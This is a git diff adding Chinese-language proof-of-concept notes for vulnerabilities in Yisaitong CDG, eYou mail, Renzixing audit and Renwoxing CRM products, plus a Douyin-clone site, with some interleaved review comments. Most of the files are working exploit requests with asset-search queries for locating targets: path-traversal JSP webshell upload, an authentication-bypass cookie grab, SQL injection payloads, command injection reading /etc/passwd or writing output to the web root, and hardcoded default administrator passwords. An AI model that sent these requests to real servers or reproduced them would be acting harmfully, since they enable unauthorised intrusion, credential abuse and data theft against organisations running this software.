20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 83 + +<?xml version="1.0" encoding="UTF-8"?> + <RDF> + <item/> + </RDF> +``` + +![1693912808724-4ca385b2-b3a5-48cc-a538-677203a4e3be.png](./img/cfnJVGCzkeilIbJP/1693912808724-4ca385b2-b3a5-48cc-a538-677203a4e3be-515003.png) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mfo68msf0ufl9qz8> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统syn_user_policy任意文件上传漏洞.md b/亿赛通电子文档安全管理系统syn_user_policy任意文件上传漏洞.md new file mode 100644 index 0000000..7dcb7ae --- /dev/null +++ b/亿赛通电子文档安全管理系统syn_user_policy任意文件上传漏洞.md 
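Review bot: step 1 of 漏洞复现 ("出现如下情况表达可能存在漏洞") only points at a screenshot; state in text what the response to `/solr/flow/dataimport` looks like when the handler is reachable, otherwise the check cannot be reproduced without the image (and `表达` should read `表示`). In the 漏洞简介 paragraph `普通门` is a typo for `普通部门`; the syn_user_policy file below has the correct wording. Since the request shows the handler accepting an attacker-supplied `dataConfig` with a `script:` transformer, the file should also carry the obvious mitigation: do not expose the `/solr/` path to unauthenticated clients, and alert on requests to `/solr/flow/dataimport` carrying a `dataConfig` parameter.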
@@ -0,0 +1,47 @@ +# 亿赛通电子文档安全管理系统syn_user_policy任意文件上传漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/u9Ky1y2wQUawV_F0/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-968665.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/fileType/importFileType.do?flag=syn_user_policy HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Content-Length: 287 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysebeiskw +Accept-Encoding: gzip, deflate +Connection: close + +------WebKitFormBoundarysebeiskw +Content-Disposition: form-data; name="fileshare"; filename="/..\\..\\..\\..\\webapps\\ROOT\\test.jsp" + +<% out.println(1111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> +------WebKitFormBoundarysebeiskw-- +``` + +![1699887100367-6d125344-50c6-4d4f-ab9f-efa399cc55a1.png](./img/u9Ky1y2wQUawV_F0/1699887100367-6d125344-50c6-4d4f-ab9f-efa399cc55a1-779465.png) + +<font style="color:rgb(51, 51, 51);">服务器回显</font><font style="color:rgb(232, 62, 140);background-color:rgb(246, 246, 246);">{"result":"xmlFail","msg":"操作失败"}</font><font style="color:rgb(51, 51, 51);">则上传成功</font> + +<font style="color:rgb(51, 51, 51);">上传文件位置</font> + +```plain +/test.jsp +``` + +![1699887140558-b9f3503d-d25c-40cf-82c8-04c185296eed.png](./img/u9Ky1y2wQUawV_F0/1699887140558-b9f3503d-d25c-40cf-82c8-04c185296eed-535457.png) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zkvw8ryeiekwzudv> \ No newline at end of file 
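Review bot: the sentence `服务器回显 {"result":"xmlFail","msg":"操作失败"} 则上传成功` reads as a contradiction; explain why an error response still means the file was written, otherwise readers will treat it as a failed attempt. The `<font style=...>` spans around that sentence are yuque export residue and should become plain markdown with inline code, consistent with the rest of the file. The `filename="/..\\..\\..\\..\\webapps\\ROOT\\test.jsp"` part of the multipart body is the whole point of the finding and deserves one sentence in the text; it also gives the detection rule: multipart POSTs to `importFileType.do?flag=syn_user_policy` whose `filename` contains `..` or a backslash.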
diff --git a/亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞.md b/亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞.md new file mode 100644 index 0000000..9499846 --- /dev/null +++ b/亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞.md 
@@ -0,0 +1,76 @@ +# 亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/qycXV3gmNouzwWlZ/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-291578.png) + +# 四、漏洞复现 +1. 通过身份认证绕过漏扫获取cookie + +```java +POST /CDGServer3/LinkFilterService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 98 + +path=BOFGGPFBFIFPBHFMGKGI&userId=GCGHGAGGFAFHFGFCFEFPFD&cur=DBNJOADCFBOPECMNBCOHMDMDKGCMMLFFCJCACB +``` + +![1706457190372-a4617e08-6349-4765-8781-65369d7d4a99.png](./img/qycXV3gmNouzwWlZ/1706457190372-a4617e08-6349-4765-8781-65369d7d4a99-664924.png) + +```java +JSESSIONID=719804E36DC9165F889264FEFC9C60C3; Path=/CDGServer3; HttpOnly +``` + +2. 
sql注入 + +```java +POST /CDGServer3/user/updateUserToOrganise.jsp;Service HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Connection: close +Content-Length: 33 +Content-Type: application/x-www-form-urlencoded +Cookie: JSESSIONID=719804E36DC9165F889264FEFC9C60C3; Path=/CDGServer3; HttpOnly +Accept-Encoding: gzip + +userId=1';WAITFOR DELAY '0:0:1'-- +``` + +![1706457248013-9305c59d-b8d9-4f17-bcc6-b9a1707e8cce.png](./img/qycXV3gmNouzwWlZ/1706457248013-9305c59d-b8d9-4f17-bcc6-b9a1707e8cce-940116.png) + +3. sqlmap + +```java +POST /CDGServer3/user/updateUserToOrganise.jsp;Service HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Connection: close +Content-Length: 33 +Content-Type: application/x-www-form-urlencoded +Cookie: JSESSIONID=719804E36DC9165F889264FEFC9C60C3; Path=/CDGServer3; HttpOnly +Accept-Encoding: gzip + +userId=1 +``` + +![1706457552134-bbb6ed1c-7502-4dfb-81fe-f08c238044a8.png](./img/qycXV3gmNouzwWlZ/1706457552134-bbb6ed1c-7502-4dfb-81fe-f08c238044a8-154865.png) + + + +> 更新: 2024-04-20 22:01:34 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cfx26o5cmkgld0ga> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统uploadFile任意文件上传漏洞.md b/亿赛通电子文档安全管理系统uploadFile任意文件上传漏洞.md new file mode 100644 index 0000000..028e1d3 --- /dev/null +++ b/亿赛通电子文档安全管理系统uploadFile任意文件上传漏洞.md 
@@ -0,0 +1,61 @@ +# 亿赛通电子文档安全管理系统uploadFile任意文件上传漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统uploadFile接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1706170000549-fdc86adb-1d49-443d-b3db-0a49c1a9ff04.png](./img/m4IM7b6tuy2o6nC3/1706170000549-fdc86adb-1d49-443d-b3db-0a49c1a9ff04-525849.png) + +![1711288172901-1346b066-5e2d-4825-9082-5e0e82e24f69.png](./img/m4IM7b6tuy2o6nC3/1711288172901-1346b066-5e2d-4825-9082-5e0e82e24f69-766504.png) + +# 四、漏洞复现 +该漏洞是在在该域名8021端口下进行上传,上传的内容是在8443端口或者8090端口 + +上传文件 + +```plain +POST /file/uploadFile HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content: MGIFOACOKLJAHOGCPPOBDFLGJFPACJJKLFGFOBDNHAGLEDGALNKAEHDLMEOODCBFDIMEFNGHCMGBPABDLPPCHCLMAELIDDCLOGNPOCGHIEFJHIOEIIPPJBCIFCPDOKIOMKPPDGPHCALHOJNNBLJBHGLMPBFICDGGMMOLGLGMIHOOFLHLBEHNIHOPOEKKIPHCMJAOMGMNPFINKHMPBFOJBJPNLNKILIOCMJIGHMNBBEBIAIKCHLENKGCPMEIIGODKKOEJJFEEIPNGHGBOOEIKNIOHIMCDONLKCEIFHIGKLHEGJNHMDAMIIELDOPGDKPOKKAHHDIMOJCJNHKMFABAFLFFDGEAJPIEOGPBNDHEOLDFBOFPFKBCEABHOPFDECBHBCFCEGO +Content-Type: multipart/form-data; boundary=00content0boundary00 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 144 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="file" +Content-Type: image/jpg + +123 +--00content0boundary00-- +``` + +![1711288224792-c3d7eaa3-82db-4e39-afe9-4bdf5cc03fb3.png](./img/m4IM7b6tuy2o6nC3/1711288224792-c3d7eaa3-82db-4e39-afe9-4bdf5cc03fb3-142205.png) + +```plain 
+CBDJCOKKKDJALCHGLOICCHCGLHNPDANBDGPPNLNLHMHLAAAGALIIHCBFPKNFHKOFEIOKAOMHAMHLILNEHEPEMGFFHOPCEPFAHHGPLHEJOKNNMLCMCCFDJNKECLEGOLOMMKPPDGPHCALHOJNNBLJBHGLMPBFICDGGEJMJMMGCAKMOOBKBNECCMOMJMEDMPDAJBMNKIJFPFOPEFNDABHJCLAINBDMEEODMBGKLIHCLLONIIGNIEMCBNKAPNPFPLOHCGM +``` + +![1711288247140-9a262aae-7ed7-47ba-910f-1d3fb269cd07.png](./img/m4IM7b6tuy2o6nC3/1711288247140-9a262aae-7ed7-47ba-910f-1d3fb269cd07-977723.png) + +![1711288273648-ef811a29-dcb7-4035-9a18-bc44f187757f.png](./img/m4IM7b6tuy2o6nC3/1711288273648-ef811a29-dcb7-4035-9a18-bc44f187757f-403907.png) + +上传文件位置,在8443端口或者8090端口 + +```plain +https://ip:8443/CDGServer3/3g/stc.jsp +``` + +![1711288324445-93a6a907-0da7-436e-822c-ca495d9712bd.png](./img/m4IM7b6tuy2o6nC3/1711288324445-93a6a907-0da7-436e-822c-ca495d9712bd-945014.png) + + + +> 更新: 2024-04-20 22:01:30 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dhcm5vbe1lakywrb> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统存在3处弱口令漏洞.md b/亿赛通电子文档安全管理系统存在3处弱口令漏洞.md new file mode 100644 index 0000000..9f4857a --- /dev/null +++ b/亿赛通电子文档安全管理系统存在3处弱口令漏洞.md @@ -0,0 +1,34 @@ +# 亿赛通电子文档安全管理系统存在3处弱口令漏洞 + +亿赛通电子文档安全管理系统(E-SafeDoc)是一种用于保护企业和组织的敏感信息的安全管理系统。它通过对电子文档进行加密、权限控制和日志记录等措施,确保数据的安全性。然而,这类系统有时会出现安全漏洞,其中之一就是弱口令漏洞。 + +## fofa + +```javascript +body="/CDGServer3/index.jsp" +``` + +## poc + +### druid + +```javascript +/CDGServer3/druid/login.html +账号:druid +密码:EstNet.Druid +``` + +### 文档管理员弱口令 + +``` +账号:DocAdmin +密码:Est@Spc820 +``` + +### 日志管理员弱口令 + +``` +账号:LogAdmin +密码:Est@Spc820 +``` + diff --git a/亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422).md b/亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422).md new file mode 100644 index 0000000..49b3800 --- /dev/null +++ b/亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422).md 
@@ -0,0 +1,37 @@ +# 亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422) + +## 一、漏洞描述 +亿邮电子邮件系统是由北京亿中邮信息技术有限公司(以下简称亿邮公司)开发的一款面向中大型集团企业、政府、高校用户的国产邮件系统。未经身份验证的攻击者利用该漏洞,可通过精心构造恶意请求,使用POST方法在目标服务器执行命令,获取目标服务器权限,控制目标服务器。 + +## 二、影响版本 +亿邮电子邮件系统V8.3-V8.13的部分二次开发版本 + +## 三、资产测绘 ++ hunter`app.name="eYou 亿邮"` ++ 特征 + +![1696567603305-22b3df25-983e-4f42-af65-71eb8a482b42.png](./img/o9mcm2_H8tummENZ/1696567603305-22b3df25-983e-4f42-af65-71eb8a482b42-511744.png) + +## 四、漏洞复现 +```java +POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 +Host: xx.xx.xx.xx +Content-Length: 25 +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Content-Type: application/x-www-form-urlencoded;charset=UTF-8 +Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0 +Connection: close + +type='|cat /etc/passwd||' +``` + +![1696567646952-f83681b0-97b3-4e30-a215-9fca047ba97b.png](./img/o9mcm2_H8tummENZ/1696567646952-f83681b0-97b3-4e30-a215-9fca047ba97b-471511.png) + + + +> 更新: 2024-02-29 23:57:46 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gn2zrdm01ief5yn7> \ No newline at end of file diff --git a/任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入漏洞.md b/任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入漏洞.md new file mode 100644 index 0000000..930b3da --- /dev/null +++ b/任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入漏洞.md 
@@ -0,0 +1,24 @@ +# 任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入漏洞 + +任子行网络安全审计系统SURF-SA系列产品是任子行为各行业提供的自主可控信息化办公环境上网行为审计的安全服务。任子行网络安全审计系统 log_fw_ips_scan_jsondata 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="任子行网络安全审计系统" +``` + +## poc + +```javascript +GET /webui/?g=log_fw_ips_scan_jsondata&uname='+union+select+sqlite_version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+ HTTP/1.1 +Host: +Referer: https:// +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +``` + +![image-20241122152436961](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221524049.png) \ No newline at end of file diff --git a/任子行网络安全审计系统sslvpn_client存在命令执行漏洞.md b/任子行网络安全审计系统sslvpn_client存在命令执行漏洞.md new file mode 100644 index 0000000..1855b0f --- /dev/null +++ b/任子行网络安全审计系统sslvpn_client存在命令执行漏洞.md 
@@ -0,0 +1,41 @@ +# 任子行网络安全审计系统sslvpn_client存在命令执行漏洞 + +# 一、漏洞简介 +任子行网络安全审计系统sslvpn_client存在命令执行漏洞,攻击者可通过此漏洞获取服务器权限。 + +# 二、影响版本 ++ 任子行网络安全审计系统 + +# 三、资产测绘 ++ hunter`web.title="任子行网络安全审计系统"` ++ 特征 + +![1701754517024-9650a99f-36cf-4d5b-bb00-72481a181d69.png](./img/NW8qdWbMZsOQJ36m/1701754517024-9650a99f-36cf-4d5b-bb00-72481a181d69-722342.png) + +# 四、漏洞复现 +```java +GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701754958503-02c63b7d-1e55-430e-bc14-1bfec57ca492.png](./img/NW8qdWbMZsOQJ36m/1701754958503-02c63b7d-1e55-430e-bc14-1bfec57ca492-076513.png) + +获取命令执行结果 + +```java +GET /sslvpn/ceshi.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701754995310-190a24ff-8343-4b7e-9499-43cb74c7d076.png](./img/NW8qdWbMZsOQJ36m/1701754995310-190a24ff-8343-4b7e-9499-43cb74c7d076-746433.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hqynfpeg5ms3gnkw> \ No newline at end of file diff --git a/任我行 CRM SmsDataList SQL注入漏洞.md b/任我行 CRM SmsDataList SQL注入漏洞.md index ce5115e..e0d92a2 100644 --- a/任我行 CRM SmsDataList SQL注入漏洞.md +++ b/任我行 CRM SmsDataList SQL注入漏洞.md @@ -1,5 +1,14 @@ ## 任我行 CRM SmsDataList SQL注入漏洞 + +## fofa + +```javascript +app="任我行-CRM" ``` + +## poc + +```javascript POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36 
@@ -10,5 +19,4 @@ Content-Type: application/x-www-form-urlencoded Content-Length: 170 Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000* - ``` diff --git a/任我行-CRM-SmsDataList-SQL注入漏洞.md b/任我行-CRM-SmsDataList-SQL注入漏洞.md new file mode 100644 index 0000000..ce5115e --- /dev/null +++ b/任我行-CRM-SmsDataList-SQL注入漏洞.md @@ -0,0 +1,14 @@ +## 任我行 CRM SmsDataList SQL注入漏洞 +``` +POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 170 + +Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000* + +``` diff --git a/任我行协同CRMSmsDataListSQL注入漏洞.md b/任我行协同CRMSmsDataListSQL注入漏洞.md new file mode 100644 index 0000000..bdeeee8 --- /dev/null +++ b/任我行协同CRMSmsDataListSQL注入漏洞.md 
@@ -0,0 +1,37 @@ +# 任我行协同CRM SmsDataList SQL注入漏洞 + +# 一、漏洞简介 +任我行CRM是CRM(客户关系管理)、OA(自动化办公)、OM(目标管理)、KM(知识管理)、HR(人力资源)一体化的企业管理软件。通过建立组织运营管理铁三角(目标行动-企业文化-知识复制),一切围绕以客户为中心的全方位、透明化业务管理(市场-销售-生产-服务),打造企业组织高效协同的运营管理平台。任我行协同CRM存在SQL注入漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。 + +# 二、影响版本 ++ 任我行协同CRM + +# 三、资产测绘 ++ hunter`app.name="任我行 CRM"` ++ 登录页面 + +![1693755730548-775a0355-02ba-402a-84c9-f9c7641487b3.png](./img/fb9-U7Q5eukS7Cj1/1693755730548-775a0355-02ba-402a-84c9-f9c7641487b3-878825.png) + +# 四、漏洞复现 +```plain +POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1 +Host: {hostname} +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Content-Length: 23 + +Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(db_name())) AND 'CvNI'='CvNI +``` + +![1693755785656-95d682b9-8ed9-43d5-9820-2b9472793922.png](./img/fb9-U7Q5eukS7Cj1/1693755785656-95d682b9-8ed9-43d5-9820-2b9472793922-602439.png) + +![1693755800442-ba863c4c-023b-4191-a0cd-d7b7f1f28132.png](./img/fb9-U7Q5eukS7Cj1/1693755800442-ba863c4c-023b-4191-a0cd-d7b7f1f28132-482931.png) + + + +> 更新: 2024-02-29 23:55:50 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qng5bs4r6v7vunkw> \ No newline at end of file diff --git a/任我行协同CRM普及版Edit存在SQL注入漏洞.md b/任我行协同CRM普及版Edit存在SQL注入漏洞.md new file mode 100644 index 0000000..8200c7c --- /dev/null +++ b/任我行协同CRM普及版Edit存在SQL注入漏洞.md 
@@ -0,0 +1,26 @@ +# 任我行协同CRM普及版Edit存在SQL注入漏洞 + +任我行协同CRM普及版是由成都市任我行信息技术有限公司开发的一款客户关系管理软件。任我行协同CRM普及版 CommonDict/Edit 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +app="任我行-CRM" +``` + +## poc + +```javascript +POST /crm/api/OpenApi/CommonDict/Edit?accesstoken=1&accesskey=1×tamp=1&nonce=1&signature=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +enumType=69&data={"ID":"1","Name":"'+UNION+ALL+SELECT+@@VERSION--"} +``` + +![image-20241122153505463](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221535532.png) \ No newline at end of file diff --git a/任我行管家婆分销ERP系统存在sql注入漏洞.md b/任我行管家婆分销ERP系统存在sql注入漏洞.md new file mode 100644 index 0000000..9672f1c --- /dev/null +++ b/任我行管家婆分销ERP系统存在sql注入漏洞.md 
@@ -0,0 +1,31 @@ +# 任我行管家婆分销ERP系统存在sql注入漏洞 + +# 一、漏洞简介 +成都任我行软件股份有限公司管家婆分销ERP系统存在sql注入漏洞 + +# 二、影响版本 ++ 管家婆分销ERP系统 + +# 三、资产测绘 ++ hunter`app.name="任我行管家婆分销 ERP"` ++ 特征 + +![1699200115160-f74d7aa1-ec34-4806-8151-2bf4ef69fa85.png](./img/j1jES1lDMCQvT9nF/1699200115160-f74d7aa1-ec34-4806-8151-2bf4ef69fa85-743940.png) + +# 四、漏洞复现 +访问以下路径报错 + +```plain +/common/viewaccountBase.asp?TimeCheckPoint=80616.91&billnumberid=-1&billtype= +``` + +![1699200602090-f8c2751d-1e3a-43c5-bdc5-138975e733ba.png](./img/j1jES1lDMCQvT9nF/1699200602090-f8c2751d-1e3a-43c5-bdc5-138975e733ba-525092.png) + +sqlmap + +![1699200576963-197e2080-8057-4fc4-8f58-6ffa8dc49a28.png](./img/j1jES1lDMCQvT9nF/1699200576963-197e2080-8057-4fc4-8f58-6ffa8dc49a28-122769.png) + + + +> 更新: 2024-02-29 23:55:50 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sazxvh1vu8fxg8rn> \ No newline at end of file diff --git a/仿抖音短视频网站系统index存在前台SQL注入漏洞.md b/仿抖音短视频网站系统index存在前台SQL注入漏洞.md new file mode 100644 index 0000000..a4d6742 --- /dev/null +++ b/仿抖音短视频网站系统index存在前台SQL注入漏洞.md 
@@ -0,0 +1,36 @@ +# 仿抖音短视频网站系统index存在前台SQL注入漏洞 + +# 一、漏洞简介 +<font style="color:rgba(0, 0, 0, 0.84);">抖音视频APP/仿9视频APP/短视频功能/原生双端开发,除了直播没有开通,其他功能都是精仿,非会员不能评论,发布视频需要注册,功能模块很多,支付模式微信,支付宝,卡密,用户自己上传带赏金,点赞,关注,留言等功能。仿抖音短视频网站系统index存在前台SQL注入漏洞</font> + +# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font> ++ 仿抖音短视频网站系统 + +# 三、资产测绘 +```plain +"/public/index/images/new_logo.png" +``` + +![1730713571936-be1c3306-5a3d-4f16-b069-cb01334a4d70.png](./img/tqFWhBpuvEPmstSt/1730713571936-be1c3306-5a3d-4f16-b069-cb01334a4d70-416120.png) + +# 四、漏洞复现 +```plain +POST /index.php?g=appapi&m=auth&a=success HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencode +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Connection: close + +uid=(SELECT 7052 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(USER() AS NCHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +``` + +![1730713829601-90fafd7e-a881-41b9-a35b-597eb09093fa.png](./img/tqFWhBpuvEPmstSt/1730713829601-90fafd7e-a881-41b9-a35b-597eb09093fa-070446.png) + + + +> 更新: 2024-11-27 10:00:37 